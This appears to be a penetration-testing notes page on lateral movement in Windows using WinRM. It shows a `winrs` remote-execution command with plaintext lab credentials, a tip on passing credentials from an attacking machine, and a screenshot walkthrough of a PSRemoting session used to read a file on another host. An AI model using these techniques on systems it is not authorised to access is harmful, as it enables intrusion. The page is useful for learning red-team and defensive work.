# Windows Remote Management Windows Remote Management (WinRM) is the name of both a Windows Service and a protocol that allows a user to interact with a remote system (e.g., run an executable modify the Registry, modify services). It may be called with the `winrm` command or by any number of programs such as PowerShell. ### WinRS Without the use of PowerShell Code execution can be accomplished with the following syntax. ``` winrs -r:DESKTOP-DELTA.dc1.dominioncyber.local -u:Adrian -p:Dathura1 calc.exe ``` {% hint style="info" %} WinRm is a great option when credentials needs to be placed when a shell from your attacking box, since the prompt never tends to show unless you have an RDP session {% endhint %} Here is a demo on the Lateral Movement executing. ![](https://244509215-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Lx2b2zLkTKHrsGfxMoR%2F-M-J3-noxtH-awphmJ_h%2F-M-J6ImD_pkXAZl_NSey%2Fwinrs-lateral-movement.gif?alt=media\&token=aa816157-76a5-47ef-b9df-4772025adae9) ### PSRemoting PowerShell Remoting is essentially a native Windows remote command execution feature that's build on top of the Windows Remote Management (WinRM) protocol. {% hint style="info" %} This feature is not set by default, it needs Admin privileges on the local and remote machine this is supported by Windows Vista with Service Pack 1 or later, Windows 7, Windows Server 2008, and Windows Server 2012 and after. {% endhint %} Now a simple demonstration I use the following syntax to simple create a remote PS-Session on the targeted machine. Enumeration here says, that I am the user John and the workstation DESKTOP-CHARLIE. I wrote a small `proof.txt` ![Charlie machine](https://244509215-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Lx2b2zLkTKHrsGfxMoR%2F-M-LTvxVmFliwQ9H0Vhh%2F-M-LUG7wIka4bO7Es2Uz%2Fimage.png?alt=media\&token=8fce8b52-f7ce-4962-85b2-d7c92844878d) Then on my Delta machine I have a small file on the Desktop with the user John logged in. ![Delta](https://244509215-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Lx2b2zLkTKHrsGfxMoR%2F-M-LXlWCF91jEraiqsRl%2F-M-LY3hjfw5sGA8GWMSo%2Fimage.png?alt=media\&token=8291813e-c785-4559-91d1-5944e0746f3f) A login windows is prompt to enter the credentials. ![](https://244509215-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Lx2b2zLkTKHrsGfxMoR%2F-M-LYEtsoM2viVSQm-yO%2F-M-LY_VP_RRMZjlkpHTd%2Fimage.png?alt=media\&token=d80936d2-6090-4170-85bd-5569cfc1d177) Once successfully entered the credentials a PS Session is started on the remote host. ![](https://244509215-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Lx2b2zLkTKHrsGfxMoR%2F-M-LYEtsoM2viVSQm-yO%2F-M-LYmkWtFkGiIr02en1%2Fimage.png?alt=media\&token=df4f3280-586e-4c08-812d-faae3f8d9ea6) And I can grab the proof.txt file contents ![](https://244509215-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Lx2b2zLkTKHrsGfxMoR%2F-M-LYqUvMbo5cl1Ee4bP%2F-M-LZ-zg0JRW1OXYCJO1%2Fimage.png?alt=media\&token=3fcb9862-3df9-4f32-b487-a489bf79c703) **Demo:** ![](https://244509215-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Lx2b2zLkTKHrsGfxMoR%2F-M-LZOhM6fe5IwuQ3RpX%2F-M-La6L1YRKPTTmoQair%2FPS-REMOTE.gif?alt=media\&token=f0fe8a75-eb3c-4792-9d82-0b986b5cfbe5) References: {% embed url="" %}